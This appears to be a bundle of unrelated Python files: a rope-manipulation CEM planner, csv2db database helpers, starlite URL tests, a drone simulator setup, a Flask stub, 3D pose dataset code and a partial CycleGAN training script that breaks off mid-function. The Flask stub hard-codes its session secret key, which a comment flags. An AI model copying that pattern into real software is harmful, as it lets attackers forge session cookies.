            act = sample_action(current, mean, cov)
            # Only the first action of the sequence is returned to the planner.
            if step == 0:
                actions[seq_idx] = act
            current = generate_next_pred_state(recon_model, dyn_model, current, act)
        imgs[seq_idx] = current
    return imgs, actions
def loss_function_img(img_recon, img_goal, N):
    """Summed binary cross-entropy between each predicted image and the goal.

    :param img_recon: list of N predicted images.
    :param img_goal: goal image.
    :param N: number of predictions.
    :return: 1-D tensor of N per-image BCE losses.
    """
    losses = torch.as_tensor([0.]*N)
    goal_flat = img_goal.view(-1, 2500)
    for idx in range(N):
        losses[idx] = F.binary_cross_entropy(img_recon[idx].view(-1, 2500), goal_flat, reduction='sum')
    return losses
def add_eye(cov):
    """Regularize a 4x4 covariance: add a tiny diagonal if it is singular,
    otherwise return it unchanged."""
    if det(cov) != 0:
        return cov
    return cov + torch.eye(4) * 0.000001
def mahalanobis(dist, cov):
    """Squared Mahalanobis distance ``dist^T cov^{-1} dist``.

    ``dist = mu1 - mu2`` as a column vector; returns a 1x1 tensor.
    """
    cov_inv = cov.inverse()
    return dist.transpose(0, 1).mm(cov_inv).mm(dist)
def bhattacharyya(dist, cov1, cov2):
    """Bhattacharyya distance between two multivariate Gaussians.

    source: https://en.wikipedia.org/wiki/Bhattacharyya_distance

    Fixes vs. original: the singularity guard now runs *before* inverting the
    pooled covariance (the old order called ``cov.inverse()`` first and
    crashed on a singular pooled matrix), and the bare name ``inf`` — a
    NameError at runtime — is replaced by ``math.inf``.

    :param dist: mean difference mu1 - mu2 (reshaped to a 4x1 column vector).
    :param cov1: covariance of the first Gaussian.
    :param cov2: covariance of the second Gaussian.
    :return: the distance, or ``math.inf`` when any covariance is singular.
    """
    cov = (cov1 + cov2) / 2
    if det(cov) == 0 or det(cov1) == 0 or det(cov2) == 0:
        return math.inf
    d1 = mahalanobis(dist.reshape((4, -1)), cov) / 8
    d2 = np.log(det(cov) / sqrt(det(cov1) * det(cov2))) / 2
    return d1 + d2
def main(recon_model, dyn_model, T, K, N, H, img_initial, img_goal, resz_act, step_i, KL):
    """Cross-entropy-method (CEM) planner.

    For each of T steps: sample N action sequences of horizon H, score them
    by BCE against the goal image, keep the K lowest-loss ones, refit a
    Gaussian over their first actions, and iterate until the KL divergence
    between consecutive fits drops below ``KL``.

    Fix vs. original: ``cov_tmp == None`` compared a tensor element-wise
    after the first iteration; replaced with ``is None``.

    :return: (action_loss, img_loss) — MSE of the chosen action against the
        ground-truth action and mean BCE of the predicted image vs. the goal.
    """
    for t in range(T):
        print("***** Start Step {}".format(t))
        if t == 0:
            img_cur = img_initial
        # Initialize Q with uniform distribution (mean/cov None makes
        # sample_action fall back to uniform sampling).
        mean = None
        cov = None
        mean_tmp = None
        cov_tmp = None
        converge = False
        iter_count = 0
        while not converge:
            imgs_recon, sample_actions = generate_next_pred_state_in_n_step(recon_model, dyn_model, img_cur, N, H, mean, cov)
            # Binary cross entropy between each predicted image and the goal.
            loss = loss_function_img(imgs_recon, img_goal, N)
            # Select K action sequences with lowest loss.
            loss_index = torch.argsort(loss)
            sorted_sample_actions = sample_actions[loss_index]
            # Fit a multivariate Gaussian to the K elite samples (see:
            # https://stackoverflow.com/questions/27230824/fit-multivariate-gaussian-distribution-to-a-given-dataset)
            mean = torch.mean(sorted_sample_actions[:K], dim=0).type(torch.DoubleTensor)
            cov = torch.from_numpy(np.cov(sorted_sample_actions[:K], rowvar=0)).type(torch.DoubleTensor)
            # Convergence test on Q: skip while either fit is unusable.
            if det(cov) == 0 or cov_tmp is None:
                mean_tmp = mean
                cov_tmp = cov
                continue
            if det(cov_tmp) == 0:
                mean_tmp = mean
                cov_tmp = cov
                continue
            p = MultivariateNormal(mean, cov)
            q = MultivariateNormal(mean_tmp, cov_tmp)
            if kl_divergence(p, q) < KL:
                converge = True
            mean_tmp = mean
            cov_tmp = cov
            print("***** At action time step {}, iteration {} *****".format(t, iter_count))
            iter_count += 1
        # Execute the action a_t* with lowest loss.
        action_best = sorted_sample_actions[0]
        action_loss = ((action_best.detach().cpu().numpy()-resz_act[:4])**2).mean(axis=None)
        # Observe new image I_{t+1}.
        img_cur = generate_next_pred_state(recon_model, dyn_model, img_cur, action_best)
        img_loss = F.binary_cross_entropy(img_cur.view(-1, 2500), img_goal.view(-1, 2500), reduction='mean')
        print("***** Generate Next Predicted Image {}*****".format(t+1))
    print("***** End Planning *****")
    return action_loss, img_loss.detach().cpu().numpy()
# ---- CEM planning driver script: loads trained models, plans one step for
# a range of rope images, and saves the per-image losses. ----
# plan result folder name
plan_folder_name = 'curve_KL'
if not os.path.exists('./plan_result/{}'.format(plan_folder_name)):
    os.makedirs('./plan_result/{}'.format(plan_folder_name))
# time step to execute the action
T = 1
# total number of samples for action sequences
N = 100
# K samples to fit multivariate gaussian distribution (N>K, K>1)
K = 50
# length of action sequence
H = 1
# model
torch.manual_seed(1)
device = torch.device("cpu")
print("Device is:", device)
recon_model = CAE().to(device)
dyn_model = SysDynamics().to(device)
# action
# load GT action
resz_act_path = './rope_dataset/rope_no_loop_all_resize_gray_clean/simplified_clean_actions_all_size50.npy'
resz_act = np.load(resz_act_path)
# checkpoint
print('***** Load Checkpoint *****')
folder_name = "test_act80_pred30"
PATH = './result/{}/checkpoint'.format(folder_name)
checkpoint = torch.load(PATH, map_location=device)
recon_model.load_state_dict(checkpoint['recon_model_state_dict'])
dyn_model.load_state_dict(checkpoint['dyn_model_state_dict'])
total_img_num = 22515
image_paths_bi = create_image_path('rope_no_loop_all_resize_gray_clean', total_img_num)
def get_image(i):
    """Load image *i* and binarize it (threshold 0.3) as a (1,1,50,50) float tensor."""
    img = TF.to_tensor(Image.open(image_paths_bi[i])) > 0.3
    return img.reshape((-1, 1, 50, 50)).type(torch.float)
# Plan one step for each consecutive image pair and record both losses.
for KL in [1000]:
    action_loss_all = []
    img_loss_all = []
    for i in range(20000, 20010):
        img_initial = get_image(i)
        img_goal = get_image(i+1)
        action_loss, img_loss = main(recon_model, dyn_model, T, K, N, H, img_initial, img_goal, resz_act[i], i, KL)
        action_loss_all.append(action_loss)
        img_loss_all.append(img_loss)
    np.save('./plan_result/{}/KL_action_{}.npy'.format(plan_folder_name, KL), action_loss_all)
    np.save('./plan_result/{}/KL_image_{}.npy'.format(plan_folder_name, KL), img_loss_all)
#!/usr/bin/env python3
#
# Since: January, 2019
# Author: gvenzl
# Name: functions.py
# Description: Common functions for csv2db
#
# Copyright 2019 Gerald Venzl
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
import glob
import gzip
import os
import platform
import io
import zipfile
import sys
import traceback
from enum import Enum
import csv
import config as cfg
class DBType(Enum):
    """Database type enumeration.

    Values are the lowercase identifiers accepted on the command line.
    """
    ORACLE = "oracle"
    ADB = "adb"
    MYSQL = "mysql"
    POSTGRES = "postgres"
    SQLSERVER = "sqlserver"
    DB2 = "db2"
class ExitCodes(Enum):
    """Program return code enumeration."""
    SUCCESS = 0
    GENERIC_ERROR = 1
    DATABASE_ERROR = 3  # value 2 is reserved for wrong arguments passed via argparse
    DATA_LOADING_ERROR = 4
class TerminalColor(Enum):
    """ANSI terminal escape sequences used for colored console output."""
    GREEN = "\x1b[32m"
    RED = "\x1b[31m"
    YELLOW = "\x1b[33m"
    RESET = "\x1b[0m"  # restores the terminal's default color
def open_file(file):
    """Open a CSV file for text reading, transparently handling compression.

    The file can be plain text (.csv), zipped (.csv.zip), or gzipped (.csv.gz).

    Parameters
    ----------
    file : str
        The file to open

    Returns
    -------
    file-object
        A file object
    """
    if file.endswith(".gz"):
        return gzip.open(file, mode="rt")
    if file.endswith(".zip"):
        # Read the first member of the archive and wrap it for text access.
        archive = zipfile.ZipFile(file, mode="r")
        first_member = archive.infolist()[0]
        return io.TextIOWrapper(archive.open(first_member, mode="r"))
    return open(file, mode='r')
def read_header(reader):
    """Read the first CSV row and return it as a list of column names.

    Spaces in column names are replaced by underscores and names are
    upper-cased, matching the identifier style used for table columns.

    Parameters
    ----------
    reader : _csv.reader
        The CSV Reader object to read the header from

    Returns
    -------
    [str,]
        A list with all the column names.
    """
    return [col.replace(" ", "_").upper() for col in next(reader)]
def find_all_files(pattern):
    """Find all files matching a glob pattern, sorted by path.

    Parameters
    ----------
    pattern : str
        The pattern to search for; if it names a directory, every CSV file
        inside it (compressed or uncompressed) is matched instead.

    Returns
    -------
    []
        List of files.
    """
    search_pattern = pattern
    if os.path.isdir(search_pattern):
        # Directory given: match *.csv plus compressed variants (*.csv.gz, *.csv.zip).
        search_pattern = search_pattern + "/*.csv*"
    return sorted(glob.glob(search_pattern))
def print_color(color, output):
    """Print colored output.

    Color is suppressed when the $NO_COLOR environment variable is set, and
    always on Windows (whose console may not honor ANSI escapes).

    Parameters
    ----------
    color : TerminalColor
        The color to be used.
    output : Any
        The output to be printed
    """
    colorize = os.getenv('NO_COLOR') is None and platform.system() != "Windows"
    if not colorize:
        print(output)
        return
    # Emit the escape code, the payload, then reset the terminal color.
    print(color.value, end='')
    print(output)
    print(TerminalColor.RESET.value, end='')
def verbose(output):
    """Print verbose output when verbose mode is enabled in the config.

    Parameters
    ----------
    output : Any
        The output to print
    """
    if not cfg.verbose:
        return
    print(output)
def debug(output):
    """Print timestamped debug output (yellow) when debug mode is enabled.

    Lists and dicts are flattened to comma-separated strings first.

    Parameters
    ----------
    output : Any
        The output to print
    """
    if not cfg.debug:
        return
    if isinstance(output, dict):
        output = ", ".join("{0}: {1}".format(key, value) for key, value in output.items())
    elif isinstance(output, list):
        output = ", ".join(output)
    print_color(TerminalColor.YELLOW, "DEBUG: {0}: {1}".format(datetime.datetime.now(), output))
def error(output):
    """Print error output in red.

    Parameters
    ----------
    output : Any
        The output to be printed
    """
    print_color(TerminalColor.RED, output)
def get_exception_details():
    """Return the current exception as a readable string plus its traceback.

    Must be called from inside an ``except`` block (uses sys.exc_info()).
    The first element has the format "<ExceptionClassName>: <message>".

    Returns
    -------
    (str, traceback)
        The string and traceback (as string) of the exception
    """
    exc_type, exc_value, tb = sys.exc_info()
    details = "{0}: {1}".format(exc_type.__name__, exc_value)
    tb_string = "Traceback:\n" + ''.join(traceback.format_tb(tb))
    return details, tb_string
def get_db_connection(db_type, user, password, host, port, db_name):
    """ Connects to the database.

    Driver modules are imported lazily so only the driver for the requested
    database type needs to be installed. Autocommit is explicitly disabled on
    the returned connection for every database type.

    Parameters
    ----------
    db_type : str
        The database type
    user : str
        The database user
    password : str
        The database user password
    host : str
        The database host or ip address
    port : str
        The port to connect to
    db_name : str
        The database or service name

    Returns
    -------
    conn
        A database connection

    Raises
    ------
    ValueError
        If db_type is not one of the supported database types
    ConnectionError
        If the driver module for db_type is not installed
    """
    try:
        if db_type == DBType.ORACLE.value:
            import cx_Oracle
            conn = cx_Oracle.connect(user,
                                     password,
                                     host + ":" + port + "/" + db_name,
                                     encoding="UTF-8", nencoding="UTF-8")
        elif db_type == DBType.ADB.value:
            import cx_Oracle
            # ADB connects via the service/TNS name only; host and port are unused here.
            # os.environ['TNS_ADMIN'] = '/home/opc/adb'
            conn = cx_Oracle.connect(user, password, db_name, encoding="UTF-8", nencoding="UTF-8")
        elif db_type == DBType.MYSQL.value:
            import mysql.connector
            conn = mysql.connector.connect(
                user=user,
                password=password,
                host=host,
                port=int(port),
                database=db_name)
        elif db_type == DBType.POSTGRES.value:
            import psycopg2
            conn = psycopg2.connect("""user='{0}'
                                       password='{1}'
                                       host='{2}'
                                       port='{3}'
                                       dbname='{4}'""".format(user, password, host, port, db_name)
                                    )
        elif db_type == DBType.DB2.value:
            import ibm_db
            import ibm_db_dbi
            conn = ibm_db.connect("PROTOCOL=TCPIP;AUTHENTICATION=SERVER;"
                                  "UID={0};PWD={1};HOSTNAME={2};PORT={3};DATABASE={4};"
                                  .format(user, password, host, port, db_name), "", "")
            # Set autocommit explicitly off
            ibm_db.autocommit(conn, ibm_db.SQL_AUTOCOMMIT_OFF)
            # DB2 returns early: the generic autocommit assignment below does not
            # apply to the ibm_db_dbi wrapper.
            return ibm_db_dbi.Connection(conn)
        elif db_type == DBType.SQLSERVER.value:
            import pymssql
            conn = pymssql.connect(server=host, user=user, password=password, database=db_name)
            # 'pymssql.Connection' object attribute 'autocommit' is read-only
            conn.autocommit(False)
            # SQL Server also returns early for the same reason as DB2.
            return conn
        else:
            raise ValueError("Database type '{0}' is not supported.".format(db_type))
        # Set autocommit explicitly off for all database types
        conn.autocommit = False
        return conn
    except ModuleNotFoundError as err:
        raise ConnectionError("Database driver module is not installed: {0}. Please install it first.".format(str(err)))
def get_default_db_port(db_type):
    """Returns the default port for a database.

    Parameters
    ----------
    db_type : str
        The database type

    Returns
    -------
    str
        The default port

    Raises
    ------
    ValueError
        If db_type is not one of the supported database types
    """
    default_ports = {
        DBType.ORACLE.value: "1521",
        DBType.ADB.value: "1521",
        DBType.MYSQL.value: "3306",
        DBType.POSTGRES.value: "5432",
        DBType.DB2.value: "50000",
        DBType.SQLSERVER.value: "1433",
    }
    try:
        return default_ports[db_type]
    except KeyError:
        # FIX: previously an unsupported type silently returned None; raise the
        # same error get_db_connection() raises so misuse fails loudly.
        raise ValueError("Database type '{0}' is not supported.".format(db_type))
def get_csv_reader(file):
    """Build a csv.reader for the file, using the separator and quote
    character configured in the global config module.

    Parameters
    ----------
    file : file-object
        A file object
    """
    return csv.reader(
        file,
        delimiter=cfg.column_separator,
        quotechar=cfg.quote_char,
    )
def executemany(cur, stmt):
    """Run executemany for cfg.input_data with the provided cursor.

    This wraps the DB API 'executemany', routing Postgres through
    psycopg2's execute_batch to work around psycopg2's slow native
    'executemany' implementation.

    Parameters
    ----------
    cur : cursor
        The cursor to run the statement with
    stmt : str
        The SQL statement to execute on
    """
    if cur is None:
        return
    if cfg.db_type == DBType.POSTGRES.value:
        import psycopg2.extras as p
        p.execute_batch(cur, stmt, cfg.input_data)
    else:
        cur.executemany(stmt, cfg.input_data)
|
import pytest
from starlite.utils.url import join_paths, normalize_path
# join_paths should collapse any combination of leading/trailing slashes into
# a single leading-slash path with no trailing slash.
@pytest.mark.parametrize(  # type: ignore[misc]
    "base,fragment, expected",
    [
        ("/path/", "sub", "/path/sub"),
        ("path/", "sub", "/path/sub"),
        ("path", "sub", "/path/sub"),
        ("/path/", "sub/", "/path/sub"),
        ("path/", "sub/", "/path/sub"),
        ("path", "sub/", "/path/sub"),
    ],
)
def test_join_url_fragments(base: str, fragment: str, expected: str) -> None:
    """join_paths joins two fragments into one normalized URL path."""
    assert join_paths([base, fragment]) == expected
@pytest.mark.parametrize("base,expected", [("/path", "/path"), ("path/", "/path"), ("path", "/path")])  # type: ignore[misc]
def test_normalize_path(base: str, expected: str) -> None:
    """normalize_path adds a leading slash and strips any trailing slash."""
    assert normalize_path(base) == expected
|
###############################################################################
#
# Drone Simulator Sample Setup 1
#
# Copyright (c) 2017, Mandar Chitre
#
# This file is part of dronesim which is released under Simplified BSD License.
# See file LICENSE or go to http://www.opensource.org/licenses/BSD-3-Clause
# for full license details.
#
# Developed at the National University of Singapore (NUS)
# as part of EG1112: Engineering Principles & Practice (EPP) II
#
###############################################################################
from dronesim import *
import numpy as _np
import vpython as _vp
# Scene setup: three landing pads drawn just below the drone's start height —
# start (yellow), lift (magenta) and end (cyan).
_size = 0.5
start_pad = _vp.box(pos=_vp.vector(0,-_size-0.1,0), length=2, height=0.22, width=2, color=_vp.color.yellow)
lift_pad = _vp.box(pos=_vp.vector(10,-_size-0.1,10), length=2, height=0.22, width=2, color=_vp.color.magenta)
end_pad = _vp.box(pos=_vp.vector(10,-_size-0.1,-10), length=2, height=0.22, width=2, color=_vp.color.cyan)

def updated_cb(drone):
    # When the drone is low (y < 1) and within 1 unit of the lift pad in x/z,
    # it "picks up" the payload: mass becomes 1.5 and the body turns orange.
    if drone.xyz.y < 1 and _np.abs(drone.xyz.x-lift_pad.pos.x) < 1 and _np.abs(drone.xyz.z-lift_pad.pos.z) < 1:
        drone.set_mass(1.5)
        drone.body.color = _vp.color.orange

# `drone` comes from `from dronesim import *` — presumably the simulated drone
# instance; verify against the dronesim package.
drone.set_updated_callback(updated_cb)
|
from flask import Flask

# UPLOAD_FOLDER = 'static/uploads/'

# Flask application instance shared by the route modules.
app = Flask(__name__)
# SECURITY NOTE(review): hard-coded secret key — load it from an environment
# variable or config file before deploying; this value signs session cookies.
app.secret_key = "secret key"
# app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024  # cap request bodies (uploads) at 16 MiB
import functools
import itertools
import logging
import more_itertools
import numpy as np
from attrdict import AttrDict
import util
# Dataset split identifiers, used as keys into Pose3DDataset.examples.
TRAIN = 0
VALID = 1
TEST = 2
class Pose3DDataset:
    """3D pose examples partitioned into train/valid/test splits.

    On construction also precomputes mean bone lengths over the training
    examples (``train_bones``) and over train+valid (``trainval_bones``),
    when those splits are non-empty.
    """

    def __init__(
            self, joint_info, train_examples=None, valid_examples=None, test_examples=None):
        self.joint_info = joint_info
        self.examples = {}
        for split, split_examples in (
                (TRAIN, train_examples), (VALID, valid_examples), (TEST, test_examples)):
            self.examples[split] = split_examples or []

        trainval = [*self.examples[TRAIN], *self.examples[VALID]]
        if trainval:
            self.trainval_bones = self.get_mean_bones(trainval)
        if self.examples[TRAIN]:
            self.train_bones = self.get_mean_bones(self.examples[TRAIN])

    def get_mean_bones(self, examples):
        """Mean length of each stick-figure edge across examples (NaN-aware)."""
        coords3d = np.stack([ex.world_coords for ex in examples], axis=0)
        bone_lengths = []
        for i, j in self.joint_info.stick_figure_edges:
            segment = coords3d[:, i] - coords3d[:, j]
            bone_lengths.append(np.nanmean(np.linalg.norm(segment, axis=-1)))
        return bone_lengths
class Pose3DExample:
    """A single 3D pose example: an image plus camera, bounding box and
    world-space joint coordinates.

    Parameters
    ----------
    image_path : str
        Path to the image file.
    world_coords
        3D joint coordinates in world space.
    bbox : array-like
        Person bounding box; stored as a numpy array.
    camera
        Camera object used to project this example.
    activity_name, scene_name : str
        Optional labels, defaulting to 'unknown'.
    mask : optional
        Optional mask for the example.
    univ_coords : optional
        Universal-scale 3D coordinates, if available (else None).
    """

    def __init__(
            self, image_path, world_coords, bbox, camera, *,
            activity_name='unknown', scene_name='unknown', mask=None, univ_coords=None):
        self.image_path = image_path
        self.world_coords = world_coords
        # FIX: `univ_coords if univ_coords is not None else None` was a redundant
        # identity expression; plain assignment is equivalent and also avoids the
        # ambiguous-truth-value trap if anyone later "simplifies" it to `or None`.
        self.univ_coords = univ_coords
        self.bbox = np.asarray(bbox)
        self.camera = camera
        self.activity_name = activity_name
        self.scene_name = scene_name
        self.mask = mask
class JointInfo:
    """Joint metadata: name<->id mapping, stick-figure edges and a left/right
    mirror mapping derived from the l*/r* naming convention."""

    def __init__(self, joints, edges):
        # `joints` may be a name->id dict, a list/tuple of names, or a
        # comma-separated string of names.
        if isinstance(joints, dict):
            self.ids = joints
        elif isinstance(joints, (list, tuple)):
            self.ids = JointInfo.make_id_map(joints)
        elif isinstance(joints, str):
            self.ids = JointInfo.make_id_map(joints.split(','))
        else:
            raise Exception
        self.names = list(sorted(self.ids.keys(), key=self.ids.get))
        self.n_joints = len(self.ids)

        # `edges` may be an explicit list of (i, j) id pairs, or a string of
        # comma-separated dash-joined name paths (each consecutive name pair on
        # a path becomes one edge; names missing from `ids` are skipped).
        if isinstance(edges, str):
            self.stick_figure_edges = []
            for path_str in edges.split(','):
                joint_names = path_str.split('-')
                for joint_name1, joint_name2 in more_itertools.pairwise(joint_names):
                    if joint_name1 in self.ids and joint_name2 in self.ids:
                        edge = (self.ids[joint_name1], self.ids[joint_name2])
                        self.stick_figure_edges.append(edge)
        else:
            self.stick_figure_edges = edges
        # the index of the joint on the opposite side (e.g. maps index of left wrist to index
        # of right wrist)
        self.mirror_mapping = [
            self.ids[JointInfo.other_side_joint_name(name)] for name in self.names]

    def update_names(self, new_names):
        """Rename all joints in order (list or comma-separated string)."""
        if isinstance(new_names, str):
            new_names = new_names.split(',')
        self.names = new_names
        new_ids = AttrDict()
        for i, new_name in enumerate(new_names):
            new_ids[new_name] = i
        self.ids = new_ids

    @staticmethod
    def make_id_map(names):
        # Attribute-style dict mapping each name to its position.
        return AttrDict(dict(zip(names, itertools.count())))

    @staticmethod
    def other_side_joint_name(name):
        # 'l...' <-> 'r...'; names without a side prefix map to themselves.
        if name.startswith('l'):
            return 'r' + name[1:]
        elif name.startswith('r'):
            return 'l' + name[1:]
        else:
            return name

    def permute_joints(self, permutation):
        """Return a new JointInfo with joints reordered by `permutation`
        (edge indices remapped through the inverse permutation)."""
        inv_perm = util.invert_permutation(permutation)
        new_names = [self.names[x] for x in permutation]
        new_edges = [(inv_perm[i], inv_perm[j]) for i, j in self.stick_figure_edges]
        return JointInfo(new_names, new_edges)
def make_h36m_incorrect_S9(*args, **kwargs):
    """Human3.6M dataset factory, with the S9 correction disabled."""
    import data.h36m
    return data.h36m.make_h36m(*args, **kwargs, correct_S9=False)
def make_h36m(*args, **kwargs):
    """Human3.6M dataset factory (lazily imports the heavy data module)."""
    import data.h36m
    return data.h36m.make_h36m(*args, **kwargs)
def make_h36m_partial(*args, **kwargs):
    """Human3.6M dataset factory with partial visibility enabled."""
    import data.h36m
    return data.h36m.make_h36m(*args, **kwargs, partial_visibility=True)
def make_mpi_inf_3dhp():
    """MPI-INF-3DHP dataset factory."""
    import data.mpi_inf_3dhp
    return data.mpi_inf_3dhp.make_mpi_inf_3dhp()
def make_mpi_inf_3dhp_correctedTS6():
    """MPI-INF-3DHP dataset factory with the TS6 correction applied."""
    import data.mpi_inf_3dhp
    return data.mpi_inf_3dhp.make_mpi_inf_3dhp(ts6_corr=True)
def current_dataset():
    """Return the dataset selected by FLAGS.dataset (cached via get_dataset)."""
    from init import FLAGS
    return get_dataset(FLAGS.dataset)
def make_merged():
    """Build a merged-skeleton dataset with no examples: joint names combine a
    common 19-joint set with dataset-specific suffixed joints, and the edges
    connect only the first (common) joints.

    NOTE(review): the '_tdhp'/'_h36m'/'_tdpw' suffixes presumably denote
    3DHP-, Human3.6M- and 3DPW-specific joints — confirm against the data
    modules.
    """
    joint_names = ['neck', 'nose', 'lsho', 'lelb', 'lwri', 'lhip', 'lkne', 'lank', 'rsho', 'relb',
                   'rwri', 'rhip', 'rkne', 'rank', 'leye', 'lear', 'reye', 'rear', 'pelv',
                   'htop_tdhp', 'neck_tdhp', 'rsho_tdhp', 'lsho_tdhp', 'rhip_tdhp', 'lhip_tdhp',
                   'spin_tdhp', 'head_tdhp', 'pelv_tdhp', 'rhip_h36m', 'lhip_h36m', 'tors_h36m',
                   'neck_h36m', 'head_h36m', 'htop_h36m', 'lsho_h36m', 'rsho_h36m', 'pelv_h36m',
                   'lhip_tdpw', 'rhip_tdpw', 'bell_tdpw', 'che1_tdpw', 'che2_tdpw', 'ltoe_tdpw',
                   'rtoe_tdpw', 'neck_tdpw', 'lcla_tdpw', 'rcla_tdpw', 'head_tdpw', 'lsho_tdpw',
                   'rsho_tdpw', 'lhan_tdpw', 'rhan_tdpw', 'pelv_tdpw']
    edges = [(1, 0), (0, 18), (0, 2), (2, 3), (3, 4), (0, 8), (8, 9), (9, 10), (18, 5), (5, 6),
             (6, 7), (18, 11), (11, 12), (12, 13), (15, 14), (14, 1), (17, 16), (16, 1)]
    joint_info = JointInfo(joint_names, edges)
    return Pose3DDataset(joint_info)
@functools.lru_cache()
def get_dataset(dataset_name):
    """Create (and cache) the dataset named `dataset_name`.

    A name ending in '.pkl' is loaded as a pickled dataset; otherwise the
    matching module-level `make_<name>` factory is called, forwarding any
    train/valid/test subject selections found on FLAGS.

    NOTE(review): results are memoized per name, so FLAGS changes after the
    first call for a given name are not picked up.
    """
    from init import FLAGS
    if dataset_name.endswith('.pkl'):
        return util.load_pickle(util.ensure_absolute_path(dataset_name))
    logging.debug(f'Making dataset {dataset_name}...')

    kwargs = {}

    def string_to_intlist(string):
        # e.g. '1,5,6' -> (1, 5, 6)
        return tuple(int(s) for s in string.split(','))

    for subj_key in ['train_subjects', 'valid_subjects', 'test_subjects']:
        if hasattr(FLAGS, subj_key) and getattr(FLAGS, subj_key):
            kwargs[subj_key] = string_to_intlist(getattr(FLAGS, subj_key))

    return globals()[f'make_{dataset_name}'](**kwargs)
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import argparse
import os
import sys
from datetime import datetime
from glob import glob

import numpy as np
import tensorflow as tf
from dateutil import tz

import data
import image_utils as im
import models
import ops
import utils
def load_data(args):
    """Build the train/test image pools for each stage of the transformation.

    Stage-1 pools (the `a_*` pair) are only built in triplet mode; otherwise
    they are None. Returns (a_data_pool, b_data_pool, c_data_pool,
    a_test_pool, b_test_pool, c_test_pool).

    NOTE(review): uses the module-level `sess`, which is created later in this
    script — load_data must only be called after the session exists.
    """
    img_ext = '/*.png'
    print("Using input directories:")
    if args.triplet:
        dir_train_phase1 = './datasets/' + args.dataset + '/train' + args.stage1 + img_ext
        dir_test_phase1 = './datasets/' + args.dataset + '/test' + args.stage1 + img_ext
        print(dir_train_phase1)
        print(dir_test_phase1)
        a_img_paths = glob(dir_train_phase1)
        a_data_pool = data.ImageData(sess, a_img_paths, args.batch_size, load_size=args.load_size, crop_size=args.crop_size)
        a_test_img_paths = glob(dir_test_phase1)
        a_test_pool = data.ImageData(sess, a_test_img_paths, args.batch_size, load_size=args.load_size, crop_size=args.crop_size)
    else:
        a_data_pool = a_test_pool = None

    dir_train_phase2 = './datasets/' + args.dataset + '/train' + args.stage2 + img_ext
    dir_train_phase3 = './datasets/' + args.dataset + '/train' + args.stage3 + img_ext
    dir_test_phase2 = './datasets/' + args.dataset + '/test' + args.stage2 + img_ext
    dir_test_phase3 = './datasets/' + args.dataset + '/test' + args.stage3 + img_ext
    print(dir_train_phase2)
    print(dir_train_phase3)
    print(dir_test_phase2)
    print(dir_test_phase3)
    b_img_paths = glob(dir_train_phase2)
    c_img_paths = glob(dir_train_phase3)
    b_data_pool = data.ImageData(sess, b_img_paths, args.batch_size, load_size=args.load_size, crop_size=args.crop_size)
    c_data_pool = data.ImageData(sess, c_img_paths, args.batch_size, load_size=args.load_size, crop_size=args.crop_size)
    b_test_img_paths = glob(dir_test_phase2)
    c_test_img_paths = glob(dir_test_phase3)
    b_test_pool = data.ImageData(sess, b_test_img_paths, args.batch_size, load_size=args.load_size, crop_size=args.crop_size)
    c_test_pool = data.ImageData(sess, c_test_img_paths, args.batch_size, load_size=args.load_size, crop_size=args.crop_size)
    return a_data_pool, b_data_pool, c_data_pool, a_test_pool, b_test_pool, c_test_pool
def save_single_img(a_real_ipt, b_real_ipt, save_dir, fname, forward_mapping=True):
    """Run one generator pass and write the single output image to save_dir/fname.

    forward_mapping selects the a->b generator; otherwise b->a is used.
    Uses the module-level session and graph nodes.
    """
    generator_node = a2b if forward_mapping else b2a
    [generated] = sess.run([generator_node], feed_dict={a_real: a_real_ipt, b_real: b_real_ipt})
    utils.mkdir(save_dir + '/')
    im.imwrite(im.immerge(np.array(generated), 1, 1), '%s/%s' % (save_dir, fname))
def training_run_id():
    """Return a run identifier: the current Helsinki local time as 'YYMMDD_HHMM'."""
    now_helsinki = datetime.now(tz.gettz('Europe/Helsinki'))
    return now_helsinki.strftime(r"%y%m%d_%H%M")
def build_networks():
    """Build the CycleGAN-style graph: generators, discriminators, losses,
    summaries and train ops.

    Reads the module-level `args`. Returns the three train ops, the three
    summary tensors, and every placeholder/generator node needed by the
    training and test loops below.
    """
    with tf.device('/gpu:%d' % args.gpu_id):
        # Nodes: image placeholders for real A/B batches and for replayed
        # generator samples (from the item pools).
        a_real = tf.placeholder(tf.float32, shape=[None, args.crop_size, args.crop_size, 3])
        b_real = tf.placeholder(tf.float32, shape=[None, args.crop_size, args.crop_size, 3])
        a2b_sample = tf.placeholder(tf.float32, shape=[None, args.crop_size, args.crop_size, 3])
        b2a_sample = tf.placeholder(tf.float32, shape=[None, args.crop_size, args.crop_size, 3])

        a2b1 = models.generator(a_real, 'a2b')
        b2a1 = models.generator(b_real, 'b2a')
        if args.transform_twice: #a-b-c
            # Apply each generator a second time (weights shared via reuse).
            a2b = models.generator(a2b1, 'a2b', reuse=True)
            b2a = models.generator(b2a1, 'b2a', reuse=True)
        else:
            a2b = a2b1
            b2a = b2a1
        b2a2b = models.generator(b2a, 'a2b', reuse=True)
        a2b2a = models.generator(a2b, 'b2a', reuse=True)
        if args.transform_twice: #a-b-c
            b2a2b = models.generator(b2a2b, 'a2b', reuse=True)
            a2b2a = models.generator(a2b2a, 'b2a', reuse=True)

        # Add extra loss term to enforce the discriminator's power to discern A samples from B samples
        a_dis = models.discriminator(a_real, 'a')
        a_from_b_dis = models.discriminator(b_real, 'a', reuse=True) #mod1
        b2a_dis = models.discriminator(b2a, 'a', reuse=True)
        b2a_sample_dis = models.discriminator(b2a_sample, 'a', reuse=True)

        b_dis = models.discriminator(b_real, 'b')
        b_from_a_dis = models.discriminator(a_real, 'b', reuse=True) #mod1
        a2b_dis = models.discriminator(a2b, 'b', reuse=True)
        a2b_sample_dis = models.discriminator(a2b_sample, 'b', reuse=True)

        double_cycle_loss = 0.0
        if args.double_cycle: #Now making these double-processed samples belong to the same domain as 1-processed. I.e. the domains are "reflexive".
            a2b_sample_dis2 = models.discriminator(models.generator(a2b_sample, 'a2b', reuse=True), 'b', reuse=True)
